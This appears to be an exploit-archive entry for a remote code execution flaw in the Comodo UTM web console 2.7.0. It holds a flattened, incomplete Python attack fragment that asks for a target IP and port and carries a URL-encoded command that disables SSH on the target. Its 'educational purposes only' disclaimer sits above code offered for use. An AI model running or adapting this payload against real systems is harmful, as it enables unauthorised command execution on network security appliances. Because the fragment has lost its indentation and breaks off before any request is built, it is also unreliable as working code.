Exploits / Vulnerability Discovered : 2020-09-22 |
Type : webapps |
Platform : multiple
This exploit / vulnerability Comodo unified threat management web console 2.7.0 remote code execution is for educational purposes only and if it is used you will do on your own risk!
def RndInt(Lenght):
from random import choice
from string import digits
RandonInt = ''.join([choice(digits) for n in range(Lenght)])
return str(RandonInt)
if __name__ == "__main__":
IP = input("IP: ")
Port = input("Port: ")
Command = '%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a' ## Disable SSH
'''For more info about command try to read manual of spesefic version of Comodo UTM and
exploit PoC (https://github.com/Fadavvi/CVE-2018-17431-PoC)
'''